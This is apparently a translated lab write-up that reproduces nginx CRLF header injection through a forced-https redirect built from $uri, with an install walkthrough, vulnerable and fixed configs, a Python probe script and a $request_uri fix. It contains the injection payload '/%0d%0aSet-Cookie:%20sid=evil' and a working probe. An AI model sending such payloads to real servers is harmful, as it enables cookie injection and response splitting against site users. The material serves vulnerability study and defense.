Reproducing the nginx CRLF (carriage return / line feed) injection vulnerability
1. Vulnerability description
CRLF is short for "Carriage Return + Line Feed" (\r\n); the two characters are 0x0d and 0x0a in hexadecimal. In HTTP, every header line ends with a CRLF, and the header block is terminated by an empty line, i.e. two consecutive CRLFs, after which the body starts. The browser relies on these separators to decide where one header ends, where the next begins, and where the body starts. So if we can control part of an HTTP response header and smuggle a raw CRLF into it, the characters after the CRLF are parsed as a new header line: we can inject a session cookie (Set-Cookie), or, with a second CRLF pair, end the header block early and inject HTML into what the browser treats as the body. CRLF injection most often shows up in the Location and Set-Cookie headers, because their values are frequently built from user input.
2. Vulnerability principle
1. Modify nginx.conf and add the configuration shown in the figure of the original write-up. The rule implements a forced redirect: whenever a user accesses the nginx server over plain HTTP, nginx answers with a redirect to the same path on the https scheme.
2. Two properties of that configuration make it exploitable. First, the redirect target is built from the `$uri` variable. `$uri` is the normalised request path, which nginx has already percent-decoded, so a request path containing `%0d%0a` is turned into a raw CRLF before it is copied into the Location header. Second, the server answers with a 302, so the Location header, together with whatever we injected after the CRLF, is sent straight back to the client, where the browser parses our text as an additional header.
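The redirect rule referred to above, written out as an added example (this is not the screenshot from the original write-up, and the server address is the lab host assumed throughout the article), with the vulnerable form and the hardened form side by side:

```nginx
# Added example: forced http -> https redirect, vulnerable and hardened form.
# 192.168.10.137 is the lab host used in this write-up (assumption).
server {
    listen 80;
    server_name 192.168.10.137;

    location / {
        # VULNERABLE: $uri is the normalised, percent-DECODED request path.
        # GET /%0d%0aSet-Cookie:%20sid=evil  ->  $uri = "/\r\nSet-Cookie: sid=evil"
        # and the client receives:
        #   Location: https://192.168.10.137/
        #   Set-Cookie: sid=evil
        return 302 https://$host$uri;

        # HARDENED: $request_uri is the raw request target exactly as the client
        # sent it, so %0d%0a stays percent-encoded and remains plain text inside
        # the Location value:
        #   Location: https://192.168.10.137/%0d%0aSet-Cookie:%20sid=evil
        # return 302 https://$host$request_uri;
    }
}
```

Only one of the two `return` lines should be active at a time; the commented `$request_uri` version is the fix, and nginx's own redirect helpers (`return 301 https://$host$request_uri;` is the usual idiom) behave the same way because they never decode the path.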
3. Vulnerability environment construction and reproduction
1. Install nginx on Ubuntu 16.04
1.1 Install the libraries nginx depends on
1.1.1 Install the gcc/g++ build dependencies
On Ubuntu the following commands can be used:
apt-get install build-essential
apt-get install libtool
1.1.2 Install the pcre dependency
apt-get install libpcre3 libpcre3-dev
1.1.3 Install the zlib dependency
apt-get install zlib1g-dev
1.1.4 Install the ssl dependency
apt-get install openssl
1.2 Install nginx
#Download the version used in this write-up:
wget http://nginx.org/download/nginx-1.11.3.tar.gz
#Unpack:
tar -zxvf nginx-1.11.3.tar.gz
#Enter the unpacked directory:
cd nginx-1.11.3
#Configure:
./configure --prefix=/usr/local/nginx
#Build nginx:
make
#Install nginx:
make install
#Start nginx:
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
1.3 Open the server in a browser to check that nginx was built and started successfully
2. Modify /usr/local/nginx/conf/nginx.conf and add the redirect rule at the position shown in the figure of the original write-up:
3. Restart nginx service
./sbin/nginx -s reload
4. Visit http://192.168.10.137/ in the browser, intercept the request with a proxy and modify the request path so that it carries a percent-encoded CRLF (`%0d%0a`) followed by a header line of our choice. As the figure in the original write-up shows, the 302 response then carries the injected header: CRLF header injection is reproduced successfully.
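The same check as a script, added here as an example and not part of the original write-up. It builds the percent-encoded payload, sends it to the lab host and reports whether the response carries the injected header; it also includes a small raw-response parser so the detection logic can be exercised offline. The host address, the probe header name `X-CRLF-Probe`, and the two sample responses are assumptions constructed for the example, not captured traffic.

```python
# Added example, not from the original write-up: build the percent-encoded CRLF
# payload, parse a raw HTTP response, and report any header that was injected.
# Host/port, the probe header name and the sample replies below are assumptions.
import http.client
import sys
import uuid
from urllib.parse import quote

MARKER_NAME = "X-CRLF-Probe"  # harmless header name chosen for the probe


def build_payload(header_name: str, header_value: str) -> str:
    """Request path that, once nginx percent-decodes $uri, splits the Location header.

    %0d%0a decodes to "\\r\\n"; everything after it is parsed by the client as a
    new header line.  Name and value are percent-encoded so the path stays a
    legal request-target on the wire.
    """
    return "/%0d%0a" + quote(header_name, safe="") + ":%20" + quote(header_value, safe="")


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, [(name, value), ...], body)."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status_line = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        name, _colon, value = line.partition(b":")
        headers.append((name.strip().decode("latin-1"), value.strip().decode("latin-1")))
    return status_line, headers, body


def injected_headers(raw: bytes, header_name: str, header_value: str):
    """Return the header lines a client would attribute to the injected name/value.

    A hardened server leaves %0d%0a encoded inside Location, so nothing matches.
    """
    _status, headers, _body = parse_response(raw)
    return [(n, v) for n, v in headers
            if n.lower() == header_name.lower() and v == header_value]


def probe(host: str, port: int = 80):
    """Live check against the lab nginx; returns (HTTP status, injected?)."""
    marker = uuid.uuid4().hex  # random value so a cached or static header cannot fool us
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", build_payload(MARKER_NAME, marker), headers={"Host": host})
    resp = conn.getresponse()
    hit = resp.getheader(MARKER_NAME) == marker
    conn.close()
    return resp.status, hit


# Constructed sample replies (not captured traffic): what the vulnerable and the
# hardened redirect rule would return for build_payload(MARKER_NAME, "deadbeef").
VULNERABLE_REPLY = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Server: nginx/1.11.3\r\n"
    b"Content-Type: text/html\r\n"
    b"Location: https://192.168.10.137/\r\n"
    b"X-CRLF-Probe: deadbeef\r\n"
    b"\r\n"
    b"<html><body>302 Found</body></html>"
)
HARDENED_REPLY = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Server: nginx/1.11.3\r\n"
    b"Content-Type: text/html\r\n"
    b"Location: https://192.168.10.137/%0d%0aX-CRLF-Probe:%20deadbeef\r\n"
    b"\r\n"
    b"<html><body>302 Found</body></html>"
)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.10.137"
    print(probe(target))
```

Run it as `python3 crlf_probe.py 192.168.10.137` against the lab box; `(302, True)` means the random marker came back as its own header, i.e. the redirect rule decoded the CRLF. The probe uses a random marker rather than a fixed `Set-Cookie` so that a header the server happens to set anyway is never mistaken for a successful injection.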
4. Vulnerability defense
1. Remove the misconfiguration. If the forced https redirect is still needed, build the target from `$request_uri` (the raw request target, which nginx does not decode) instead of `$uri`, so a `%0d%0a` in the path stays percent-encoded text inside the Location header instead of becoming a real line break.
----------
Reference: https://blog.csdn.net/liuhuaijin/article/details/77449579